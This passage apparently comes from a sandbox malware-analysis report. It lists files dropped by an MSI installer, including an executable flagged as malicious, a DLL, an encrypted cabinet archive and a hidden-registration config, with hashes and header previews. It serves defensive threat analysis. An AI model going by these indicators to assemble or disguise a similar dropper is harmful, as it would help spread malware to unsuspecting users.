                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>~.dz..7z..7z..7sgz7n..7(j.6x..7.p.7}..7(j.6m..7(j.6p..7(j.6~..7.f.6`..7nt.6s..7z..7...7.j.6...7z..7u..7.j.6{..7Richz..7........................PE..d.....c.........."......^>..F...... .=........@..............................U...........`...................................................S.D.............S.4|...........PU..|..0.R.......................R.(...P.R.8............p>..............................text...n]>......^>................. ..`.rdata..@....p>......b>.............@..@.data........@S..t...(S.............@....pdata..4|....S..~....S.............@..@.reloc...|...PU..~....U.............@..B........................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\expand.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):5609472
                                                  Entropy (8bit):6.57517312270674
                                                  Encrypted:false
                                                  SSDEEP:49152:g2xSVi6to3D8COYcboaLKCIwfwqnD3qfv6Nr4NdHAaeb/s46VxQ0GigqU1DUpsFu:hxS+rc2Szaf3zXqBErS+
                                                  MD5:F65B1FC89A4324BEFDB6F24406BAEF6A
                                                  SHA1:BA820B503D6BC3D9A27C0D5DBD61D8E0DEE166E9
                                                  SHA-256:E734882F835EB93A77DC1769C7F57211501AA907889ADC941F87F63725BF4EEB
                                                  SHA-512:EEA285E51EE1B3FC42679C0DCB2CDD73E984DE29FD74A39BEFB1C51AD303CC0026F57A12A036E5F6905386DD5281C53B671F2FDE7B00F832297BF756635A0505
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>~.dz..7z..7z..7sgz7n..7(j.6x..7.p.7}..7(j.6m..7(j.6p..7(j.6~..7.f.6`..7nt.6s..7z..7...7.j.6...7z..7u..7.j.6{..7Richz..7........................PE..d.....c.........."......^>..F...... .=........@..............................U...........`...................................................S.D.............S.4|...........PU..|..0.R.......................R.(...P.R.8............p>..............................text...n]>......^>................. ..`.rdata..@....p>......b>.............@..@.data........@S..t...(S.............@....pdata..4|....S..~....S.............@..@.reloc...|...PU..~....U.............@..B........................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\expand.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):101664
                                                  Entropy (8bit):6.571798459921823
                                                  Encrypted:false
                                                  SSDEEP:1536:sC6b39cL/iRDhXq4GZLAy10i5XNC83tTPw98APXbxecbSQ25I4I/Cq:sVPphXq30yvXL5APbxecbSDu
                                                  MD5:7A2B8CFCD543F6E4EBCA43162B67D610
                                                  SHA1:C1C45A326249BF0CCD2BE2FBD412F1A62FB67024
                                                  SHA-256:7D7CA28235FBA5603A7F40514A552AC7EFAA67A5D5792BB06273916AA8565C5F
                                                  SHA-512:E38304FB9C5AF855C1134F542ADF72CDE159FAB64385533EAFA5BB6E374F19B5A29C0CB5516FC5DA5C0B5AC47C2F6420792E0AC8DDFF11E749832A7B7F3EB5C8
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Joe Sandbox View:
                                                  • Filename: 4xkXHjUHJN.msi, Detection: malicious, Browse
                                                  • Filename: Tw9XaCvXwG.exe, Detection: malicious, Browse
                                                  • Filename: axQABMkG5H.msi, Detection: malicious, Browse
                                                  • Filename: SecuriteInfo.com.Heuristic.HEUR.AGEN.1253469.14711.357.exe, Detection: malicious, Browse
                                                  • Filename: 25z4YRgeJM.exe, Detection: malicious, Browse
                                                  • Filename: 25z4YRgeJM.exe, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!/.NeNl.eNl.eNl....gNl.l6..nNl.eNm.INl..>o.hNl..>h.uNl..>i.zNl..>l.dNl..>..dNl..>n.dNl.RicheNl.................PE..d....Y._.........." .........^......p.....................................................`A........................................`1..4....9.......p.......P.......L.. A..........H...T...............................0............................................text............................... ..`.rdata...?.......@..................@..@.data...0....@.......4..............@....pdata.......P.......8..............@..@_RDATA.......`.......D..............@..@.rsrc........p.......F..............@..@.reloc...............J..............@..B........................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1498
                                                  Entropy (8bit):3.672855224331937
                                                  Encrypted:false
                                                  SSDEEP:24:F5dX8DW8XjFmAR7MsjfdrFxL88bL88oyOL88lmAIYedBr:F5YHljfhFxL8SL8j7L8xBr
                                                  MD5:595F3E1B76CD11D8F02022C1955A277A
                                                  SHA1:9ADEFB19488A4C04C5D8590BAD0784BFB992696E
                                                  SHA-256:05B84A681478E0E762D0245CD64F106492EB4AB648AB6E4D6D24A4DF2FCFC5A5
                                                  SHA-512:4A1CBE84F5D64E2F18C18F08ED460857E2D21A36C1730F1C1A33DC5DA425C82DB824C2DA7C4DDD0449761409F1D3A94D964623A34DDF52BE21364F5793884B30
                                                  Malicious:false
                                                  Preview:W.r.a.p.p.e.d.A.p.p.l.i.c.a.t.i.o.n.I.d.=.{.9.0.1.6.0.0.0.0.-.0.0.7.E.-.0.0.0.0.-.1.0.0.0.-.0.0.0.0.0.0.0.F.F.1.C.E.}...W.r.a.p.p.e.d.R.e.g.i.s.t.r.a.t.i.o.n.=.H.i.d.d.e.n...I.n.s.t.a.l.l.S.u.c.c.e.s.s.C.o.d.e.s.=.0...E.l.e.v.a.t.i.o.n.M.o.d.e.=.n.e.v.e.r...B.a.s.e.N.a.m.e.=.U.I.S.e.r.v.i.c.e.s...e.x.e...C.a.b.H.a.s.h.=.9.6.a.f.c.a.7.3.3.a.4.1.9.f.2.c.4.a.5.d.e.a.6.e.7.5.6.9.1.2.5.8.4.2.4.7.7.e.7.3.0.0.e.d.9.d.a.8.5.5.3.8.5.4.a.7.b.1.1.d.a.d.6.c...S.e.t.u.p.P.a.r.a.m.e.t.e.r.s.=...W.o.r.k.i.n.g.D.i.r.=...C.u.r.r.e.n.t.D.i.r.=.*.F.I.L.E.S.D.I.R.*...U.I.L.e.v.e.l.=.5...F.o.c.u.s.=.y.e.s...S.e.s.s.i.o.n.D.i.r.=.C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.4.1.c.1.7.3.f.9.-.8.7.9.8.-.4.9.4.b.-.a.a.1.9.-.9.d.b.4.6.f.2.8.a.6.d.1.\...F.i.l.e.s.D.i.r.=.C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.4.1.c.1.7.3.f.9.-.8.7.9.8.-.4.9.4.b.-.a.a.1.9.-.9.d.b.4.6.f.2.8.a.6.d.1.\.f.i.l.e.s.\...R.u.n.B.e.f.o.r.e.I.n.s.t.a.l.l.F.i.l.e.=...R.u.n.B.e.
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:Microsoft Cabinet archive data, many, 2465794 bytes, 2 files, at 0x2c +A "UIServices.exe" +A "vcruntime140.dll", ID 29986, number 1, 175 datablocks, 0x1503 compression
                                                  Category:dropped
                                                  Size (bytes):2465794
                                                  Entropy (8bit):7.999864847703612
                                                  Encrypted:true
                                                  SSDEEP:49152:PBdidvJXFzhYsAdZYH4YwKw2oHUNgir2MYgoGLcOh0YdMsyRyIQwF:PBxZtYDWHUNgiazgowjzu1QwF
                                                  MD5:97AF5456199BE2890D17BD4F166ADD0E
                                                  SHA1:4CD664992D1C04B2E2F65F9EF1C8C5B295687ADD
                                                  SHA-256:96AFCA733A419F2C4A5DEA6E7569125842477E7300ED9DA8553854A7B11DAD6C
                                                  SHA-512:DECE5558442E898750487B5A2ACA1CA3A2B165D675BB3703A1B8FF5BA88C581B2E6E15DC1DF62B585FF37F3354D047C8FA2B0E723B37FFB0684CDB89044E2471
                                                  Malicious:false
                                                  Preview:MSCF......%.....,..............."u..l.........U.......{U6. .UIServices.exe. .....U....Q.P .vcruntime140.dll..K.7.:..[...@. ......5..N....o..Z.hH...i..._.E.S..D.....F.E..<./..p..R-.......Z...jd..H......{...L...l.M..~..}&.4...Z.......GT.s-j.Q.@p.U..0.m..[1cF..F).a.X...(.^.U........E.....K..Z.........#.UEeV@.{.........9....{.7..7..0evYB..F"......P...P.X..e.....P..p..H.....o.B.A...zqp....+.(!... b..N...w.s...G.....0T...YGB..u..BL.!+KC...".a.......".0.fvvx......6.^/...;..^...m.**...).q..u.V.9IizF+}.d.gR.q@.....<\.=.Z.v.........C.I..4.\3.(..^;l.."...q.....,.v..........x.......5...@.E.#."..3.8.O..j@.|....j....;.G8..s...g}$.G@...Y..8...{\**27.j...~...2.V.4..X.......P..t.z\.?ht..^&G..O/S]|.R..fT.E.s.v*"...Q....PE|%..g.@...:......p..;...~d.B..E........K;TF.... X:.~C..x(-.:..W..WQ.rs..........jmPRG4.......P!g...'....*....,.*F..7...f~(..z...O.6}.....I.?.".#.aI6..E..zE....DN..N...D...n2.Gd..Vg..z&.)-<U;......>.AGQjL.X,1..F.6u.f..e\]CK.aE..[9.c...(....d../j.
                                                  Process:C:\Windows\SysWOW64\expand.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):5609472
                                                  Entropy (8bit):6.57517312270674
                                                  Encrypted:false
                                                  SSDEEP:49152:g2xSVi6to3D8COYcboaLKCIwfwqnD3qfv6Nr4NdHAaeb/s46VxQ0GigqU1DUpsFu:hxS+rc2Szaf3zXqBErS+
                                                  MD5:F65B1FC89A4324BEFDB6F24406BAEF6A
                                                  SHA1:BA820B503D6BC3D9A27C0D5DBD61D8E0DEE166E9
                                                  SHA-256:E734882F835EB93A77DC1769C7F57211501AA907889ADC941F87F63725BF4EEB
                                                  SHA-512:EEA285E51EE1B3FC42679C0DCB2CDD73E984DE29FD74A39BEFB1C51AD303CC0026F57A12A036E5F6905386DD5281C53B671F2FDE7B00F832297BF756635A0505
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>~.dz..7z..7z..7sgz7n..7(j.6x..7.p.7}..7(j.6m..7(j.6p..7(j.6~..7.f.6`..7nt.6s..7z..7...7.j.6...7z..7u..7.j.6{..7Richz..7........................PE..d.....c.........."......^>..F...... .=........@..............................U...........`...................................................S.D.............S.4|...........PU..|..0.R.......................R.(...P.R.8............p>..............................text...n]>......^>................. ..`.rdata..@....p>......b>.............@..@.data........@S..t...(S.............@....pdata..4|....S..~....S.............@..@.reloc...|...PU..~....U.............@..B........................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\expand.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):5609472
                                                  Entropy (8bit):6.57517312270674
                                                  Encrypted:false
                                                  SSDEEP:49152:g2xSVi6to3D8COYcboaLKCIwfwqnD3qfv6Nr4NdHAaeb/s46VxQ0GigqU1DUpsFu:hxS+rc2Szaf3zXqBErS+
                                                  MD5:F65B1FC89A4324BEFDB6F24406BAEF6A
                                                  SHA1:BA820B503D6BC3D9A27C0D5DBD61D8E0DEE166E9
                                                  SHA-256:E734882F835EB93A77DC1769C7F57211501AA907889ADC941F87F63725BF4EEB
                                                  SHA-512:EEA285E51EE1B3FC42679C0DCB2CDD73E984DE29FD74A39BEFB1C51AD303CC0026F57A12A036E5F6905386DD5281C53B671F2FDE7B00F832297BF756635A0505
                                                  Malicious:false
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>~.dz..7z..7z..7sgz7n..7(j.6x..7.p.7}..7(j.6m..7(j.6p..7(j.6~..7.f.6`..7nt.6s..7z..7...7.j.6...7z..7u..7.j.6{..7Richz..7........................PE..d.....c.........."......^>..F...... .=........@..............................U...........`...................................................S.D.............S.4|...........PU..|..0.R.......................R.(...P.R.8............p>..............................text...n]>......^>................. ..`.rdata..@....p>......b>.............@..@.data........@S..t...(S.............@....pdata..4|....S..~....S.............@..@.reloc...|...PU..~....U.............@..B........................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\expand.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):101664
                                                  Entropy (8bit):6.571798459921823
                                                  Encrypted:false
                                                  SSDEEP:1536:sC6b39cL/iRDhXq4GZLAy10i5XNC83tTPw98APXbxecbSQ25I4I/Cq:sVPphXq30yvXL5APbxecbSDu
                                                  MD5:7A2B8CFCD543F6E4EBCA43162B67D610
                                                  SHA1:C1C45A326249BF0CCD2BE2FBD412F1A62FB67024
                                                  SHA-256:7D7CA28235FBA5603A7F40514A552AC7EFAA67A5D5792BB06273916AA8565C5F
                                                  SHA-512:E38304FB9C5AF855C1134F542ADF72CDE159FAB64385533EAFA5BB6E374F19B5A29C0CB5516FC5DA5C0B5AC47C2F6420792E0AC8DDFF11E749832A7B7F3EB5C8
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!/.NeNl.eNl.eNl....gNl.l6..nNl.eNm.INl..>o.hNl..>h.uNl..>i.zNl..>l.dNl..>..dNl..>n.dNl.RicheNl.................PE..d....Y._.........." .........^......p.....................................................`A........................................`1..4....9.......p.......P.......L.. A..........H...T...............................0............................................text............................... ..`.rdata...?.......@..................@..@.data...0....@.......4..............@....pdata.......P.......8..............@..@_RDATA.......`.......D..............@..@.rsrc........p.......F..............@..@.reloc...............J..............@..B........................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\expand.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):101664
                                                  Entropy (8bit):6.571798459921823
                                                  Encrypted:false
                                                  SSDEEP:1536:sC6b39cL/iRDhXq4GZLAy10i5XNC83tTPw98APXbxecbSQ25I4I/Cq:sVPphXq30yvXL5APbxecbSDu
                                                  MD5:7A2B8CFCD543F6E4EBCA43162B67D610
                                                  SHA1:C1C45A326249BF0CCD2BE2FBD412F1A62FB67024
                                                  SHA-256:7D7CA28235FBA5603A7F40514A552AC7EFAA67A5D5792BB06273916AA8565C5F
                                                  SHA-512:E38304FB9C5AF855C1134F542ADF72CDE159FAB64385533EAFA5BB6E374F19B5A29C0CB5516FC5DA5C0B5AC47C2F6420792E0AC8DDFF11E749832A7B7F3EB5C8
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!/.NeNl.eNl.eNl....gNl.l6..nNl.eNm.INl..>o.hNl..>h.uNl..>i.zNl..>l.dNl..>..dNl..>n.dNl.RicheNl.................PE..d....Y._.........." .........^......p.....................................................`A........................................`1..4....9.......p.......P.......L.. A..........H...T...............................0............................................text............................... ..`.rdata...?.......@..................@..@.data...0....@.......4..............@....pdata.......P.......8..............@..@_RDATA.......`.......D..............@..@.rsrc........p.......F..............@..@.reloc...............J..............@..B........................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1498
                                                  Entropy (8bit):3.6692539754055673
                                                  Encrypted:false
                                                  SSDEEP:24:F5dX8DW8XjFmAR7MsjfdrFxLINlwLINl7VyOLINl7wmAuwnN:F5YHljfhFxLYwLY7V7LY7BQ
                                                  MD5:9A908CE28600B7D878F5AAF192D86B3B
                                                  SHA1:E389564F74369A7961FFF359E22464E384DD8684
                                                  SHA-256:176909712F3D1A7437465C30B5F425971DD71DDAE1D47E79448C6804CFCC1046
                                                  SHA-512:5421CC1FC0361217AFA92208E8CB1BD395635451CE202FF927FF8B56BD3691DCBB013C044E0463C89F5800999BD5B84E3DC0622EBBC1D8CCCF50C7A11CB5D816
                                                  Malicious:false
                                                  Preview:W.r.a.p.p.e.d.A.p.p.l.i.c.a.t.i.o.n.I.d.=.{.9.0.1.6.0.0.0.0.-.0.0.7.E.-.0.0.0.0.-.1.0.0.0.-.0.0.0.0.0.0.0.F.F.1.C.E.}...W.r.a.p.p.e.d.R.e.g.i.s.t.r.a.t.i.o.n.=.H.i.d.d.e.n...I.n.s.t.a.l.l.S.u.c.c.e.s.s.C.o.d.e.s.=.0...E.l.e.v.a.t.i.o.n.M.o.d.e.=.n.e.v.e.r...B.a.s.e.N.a.m.e.=.U.I.S.e.r.v.i.c.e.s...e.x.e...C.a.b.H.a.s.h.=.9.6.a.f.c.a.7.3.3.a.4.1.9.f.2.c.4.a.5.d.e.a.6.e.7.5.6.9.1.2.5.8.4.2.4.7.7.e.7.3.0.0.e.d.9.d.a.8.5.5.3.8.5.4.a.7.b.1.1.d.a.d.6.c...S.e.t.u.p.P.a.r.a.m.e.t.e.r.s.=...W.o.r.k.i.n.g.D.i.r.=...C.u.r.r.e.n.t.D.i.r.=.*.F.I.L.E.S.D.I.R.*...U.I.L.e.v.e.l.=.5...F.o.c.u.s.=.y.e.s...S.e.s.s.i.o.n.D.i.r.=.C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.4.4.1.1.4.5.6.2.-.6.7.6.0.-.4.a.4.c.-.9.7.c.1.-.6.b.4.4.9.1.c.7.0.9.b.3.\...F.i.l.e.s.D.i.r.=.C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.4.4.1.1.4.5.6.2.-.6.7.6.0.-.4.a.4.c.-.9.7.c.1.-.6.b.4.4.9.1.c.7.0.9.b.3.\.f.i.l.e.s.\...R.u.n.B.e.f.o.r.e.I.n.s.t.a.l.l.F.i.l.e.=...R.u.n.B.e.
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:Microsoft Cabinet archive data, many, 2465794 bytes, 2 files, at 0x2c +A "UIServices.exe" +A "vcruntime140.dll", ID 29986, number 1, 175 datablocks, 0x1503 compression
                                                  Category:dropped
                                                  Size (bytes):2465794
                                                  Entropy (8bit):7.999864847703612
                                                  Encrypted:true
                                                  SSDEEP:49152:PBdidvJXFzhYsAdZYH4YwKw2oHUNgir2MYgoGLcOh0YdMsyRyIQwF:PBxZtYDWHUNgiazgowjzu1QwF
                                                  MD5:97AF5456199BE2890D17BD4F166ADD0E
                                                  SHA1:4CD664992D1C04B2E2F65F9EF1C8C5B295687ADD
                                                  SHA-256:96AFCA733A419F2C4A5DEA6E7569125842477E7300ED9DA8553854A7B11DAD6C
                                                  SHA-512:DECE5558442E898750487B5A2ACA1CA3A2B165D675BB3703A1B8FF5BA88C581B2E6E15DC1DF62B585FF37F3354D047C8FA2B0E723B37FFB0684CDB89044E2471
                                                  Malicious:false
                                                  Preview:MSCF......%.....,..............."u..l.........U.......{U6. .UIServices.exe. .....U....Q.P .vcruntime140.dll..K.7.:..[...@. ......5..N....o..Z.hH...i..._.E.S..D.....F.E..<./..p..R-.......Z...jd..H......{...L...l.M..~..}&.4...Z.......GT.s-j.Q.@p.U..0.m..[1cF..F).a.X...(.^.U........E.....K..Z.........#.UEeV@.{.........9....{.7..7..0evYB..F"......P...P.X..e.....P..p..H.....o.B.A...zqp....+.(!... b..N...w.s...G.....0T...YGB..u..BL.!+KC...".a.......".0.fvvx......6.^/...;..^...m.**...).q..u.V.9IizF+}.d.gR.q@.....<\.=.Z.v.........C.I..4.\3.(..^;l.."...q.....,.v..........x.......5...@.E.#."..3.8.O..j@.|....j....;.G8..s...g}$.G@...Y..8...{\**27.j...~...2.V.4..X.......P..t.z\.?ht..^&G..O/S]|.R..fT.E.s.v*"...Q....PE|%..g.@...:......p..;...~d.B..E........K;TF.... X:.~C..x(-.:..W..WQ.rs..........jmPRG4.......P!g...'....*....,.*F..7...f~(..z...O.6}.....I.?.".#.aI6..E..zE....DN..N...D...n2.Gd..Vg..z&.)-<U;......>.AGQjL.X,1..F.6u.f..e\]CK.aE..[9.c...(....d../j.
                                                  Process:C:\Windows\SysWOW64\expand.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):5609472
                                                  Entropy (8bit):6.57517312270674
                                                  Encrypted:false
                                                  SSDEEP:49152:g2xSVi6to3D8COYcboaLKCIwfwqnD3qfv6Nr4NdHAaeb/s46VxQ0GigqU1DUpsFu:hxS+rc2Szaf3zXqBErS+
                                                  MD5:F65B1FC89A4324BEFDB6F24406BAEF6A
                                                  SHA1:BA820B503D6BC3D9A27C0D5DBD61D8E0DEE166E9
                                                  SHA-256:E734882F835EB93A77DC1769C7F57211501AA907889ADC941F87F63725BF4EEB
                                                  SHA-512:EEA285E51EE1B3FC42679C0DCB2CDD73E984DE29FD74A39BEFB1C51AD303CC0026F57A12A036E5F6905386DD5281C53B671F2FDE7B00F832297BF756635A0505
                                                  Malicious:false
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>~.dz..7z..7z..7sgz7n..7(j.6x..7.p.7}..7(j.6m..7(j.6p..7(j.6~..7.f.6`..7nt.6s..7z..7...7.j.6...7z..7u..7.j.6{..7Richz..7........................PE..d.....c.........."......^>..F...... .=........@..............................U...........`...................................................S.D.............S.4|...........PU..|..0.R.......................R.(...P.R.8............p>..............................text...n]>......^>................. ..`.rdata..@....p>......b>.............@..@.data........@S..t...(S.............@....pdata..4|....S..~....S.............@..@.reloc...|...PU..~....U.............@..B........................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\expand.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):101664
                                                  Entropy (8bit):6.571798459921823
                                                  Encrypted:false
                                                  SSDEEP:1536:sC6b39cL/iRDhXq4GZLAy10i5XNC83tTPw98APXbxecbSQ25I4I/Cq:sVPphXq30yvXL5APbxecbSDu
                                                  MD5:7A2B8CFCD543F6E4EBCA43162B67D610
                                                  SHA1:C1C45A326249BF0CCD2BE2FBD412F1A62FB67024
                                                  SHA-256:7D7CA28235FBA5603A7F40514A552AC7EFAA67A5D5792BB06273916AA8565C5F
                                                  SHA-512:E38304FB9C5AF855C1134F542ADF72CDE159FAB64385533EAFA5BB6E374F19B5A29C0CB5516FC5DA5C0B5AC47C2F6420792E0AC8DDFF11E749832A7B7F3EB5C8
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!/.NeNl.eNl.eNl....gNl.l6..nNl.eNm.INl..>o.hNl..>h.uNl..>i.zNl..>l.dNl..>..dNl..>n.dNl.RicheNl.................PE..d....Y._.........." .........^......p.....................................................`A........................................`1..4....9.......p.......P.......L.. A..........H...T...............................0............................................text............................... ..`.rdata...?.......@..................@..@.data...0....@.......4..............@....pdata.......P.......8..............@..@_RDATA.......`.......D..............@..@.rsrc........p.......F..............@..@.reloc...............J..............@..B........................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\expand.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):5609472
                                                  Entropy (8bit):6.57517312270674
                                                  Encrypted:false
                                                  SSDEEP:49152:g2xSVi6to3D8COYcboaLKCIwfwqnD3qfv6Nr4NdHAaeb/s46VxQ0GigqU1DUpsFu:hxS+rc2Szaf3zXqBErS+
                                                  MD5:F65B1FC89A4324BEFDB6F24406BAEF6A
                                                  SHA1:BA820B503D6BC3D9A27C0D5DBD61D8E0DEE166E9
                                                  SHA-256:E734882F835EB93A77DC1769C7F57211501AA907889ADC941F87F63725BF4EEB
                                                  SHA-512:EEA285E51EE1B3FC42679C0DCB2CDD73E984DE29FD74A39BEFB1C51AD303CC0026F57A12A036E5F6905386DD5281C53B671F2FDE7B00F832297BF756635A0505
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>~.dz..7z..7z..7sgz7n..7(j.6x..7.p.7}..7(j.6m..7(j.6p..7(j.6~..7.f.6`..7nt.6s..7z..7...7.j.6...7z..7u..7.j.6{..7Richz..7........................PE..d.....c.........."......^>..F...... .=........@..............................U...........`...................................................S.D.............S.4|...........PU..|..0.R.......................R.(...P.R.8............p>..............................text...n]>......^>................. ..`.rdata..@....p>......b>.............@..@.data........@S..t...(S.............@....pdata..4|....S..~....S.............@..@.reloc...|...PU..~....U.............@..B........................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\expand.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):101664
                                                  Entropy (8bit):6.571798459921823
                                                  Encrypted:false
                                                  SSDEEP:1536:sC6b39cL/iRDhXq4GZLAy10i5XNC83tTPw98APXbxecbSQ25I4I/Cq:sVPphXq30yvXL5APbxecbSDu
                                                  MD5:7A2B8CFCD543F6E4EBCA43162B67D610
                                                  SHA1:C1C45A326249BF0CCD2BE2FBD412F1A62FB67024
                                                  SHA-256:7D7CA28235FBA5603A7F40514A552AC7EFAA67A5D5792BB06273916AA8565C5F
                                                  SHA-512:E38304FB9C5AF855C1134F542ADF72CDE159FAB64385533EAFA5BB6E374F19B5A29C0CB5516FC5DA5C0B5AC47C2F6420792E0AC8DDFF11E749832A7B7F3EB5C8
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!/.NeNl.eNl.eNl....gNl.l6..nNl.eNm.INl..>o.hNl..>h.uNl..>i.zNl..>l.dNl..>..dNl..>n.dNl.RicheNl.................PE..d....Y._.........." .........^......p.....................................................`A........................................`1..4....9.......p.......P.......L.. A..........H...T...............................0............................................text............................... ..`.rdata...?.......@..................@..@.data...0....@.......4..............@....pdata.......P.......8..............@..@_RDATA.......`.......D..............@..@.rsrc........p.......F..............@..@.reloc...............J..............@..B........................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1498
                                                  Entropy (8bit):3.6686311788172308
                                                  Encrypted:false
                                                  SSDEEP:24:F5dX8DW8XjFmAR7MsjfdrFxLlWfPKLlWfPSMyOLlWfPSxmAN0KT7NGw2R:F5YHljfhFxLMfCLMfz7LMfy09R
                                                  MD5:F74603B1A562D052E5B12B357D455AD8
                                                  SHA1:B29185EE5AE86B1A8E8ABC32E1612B9037AD42F6
                                                  SHA-256:5997AC1D6E702A55B11BAA3559E10AA56EE3935A9E09E2D8063BBE1AA9D333B1
                                                  SHA-512:6F965210BA7161EAEF225F12B57BE35532E2AFAD490AEF62DCD8DCDA59041A8CF33897A044A90A7C1A117F8D83AEF506A8FEA2CDFAE2CFD4C80A30FB29AA0376
                                                  Malicious:false
                                                  Preview:W.r.a.p.p.e.d.A.p.p.l.i.c.a.t.i.o.n.I.d.=.{.9.0.1.6.0.0.0.0.-.0.0.7.E.-.0.0.0.0.-.1.0.0.0.-.0.0.0.0.0.0.0.F.F.1.C.E.}...W.r.a.p.p.e.d.R.e.g.i.s.t.r.a.t.i.o.n.=.H.i.d.d.e.n...I.n.s.t.a.l.l.S.u.c.c.e.s.s.C.o.d.e.s.=.0...E.l.e.v.a.t.i.o.n.M.o.d.e.=.n.e.v.e.r...B.a.s.e.N.a.m.e.=.U.I.S.e.r.v.i.c.e.s...e.x.e...C.a.b.H.a.s.h.=.9.6.a.f.c.a.7.3.3.a.4.1.9.f.2.c.4.a.5.d.e.a.6.e.7.5.6.9.1.2.5.8.4.2.4.7.7.e.7.3.0.0.e.d.9.d.a.8.5.5.3.8.5.4.a.7.b.1.1.d.a.d.6.c...S.e.t.u.p.P.a.r.a.m.e.t.e.r.s.=...W.o.r.k.i.n.g.D.i.r.=...C.u.r.r.e.n.t.D.i.r.=.*.F.I.L.E.S.D.I.R.*...U.I.L.e.v.e.l.=.5...F.o.c.u.s.=.y.e.s...S.e.s.s.i.o.n.D.i.r.=.C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.8.3.8.4.6.a.6.a.-.5.3.3.5.-.4.9.c.7.-.a.6.4.d.-.3.2.1.5.7.7.1.d.e.f.a.9.\...F.i.l.e.s.D.i.r.=.C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.8.3.8.4.6.a.6.a.-.5.3.3.5.-.4.9.c.7.-.a.6.4.d.-.3.2.1.5.7.7.1.d.e.f.a.9.\.f.i.l.e.s.\...R.u.n.B.e.f.o.r.e.I.n.s.t.a.l.l.F.i.l.e.=...R.u.n.B.e.
                                                  Process:C:\Windows\System32\curl.exe
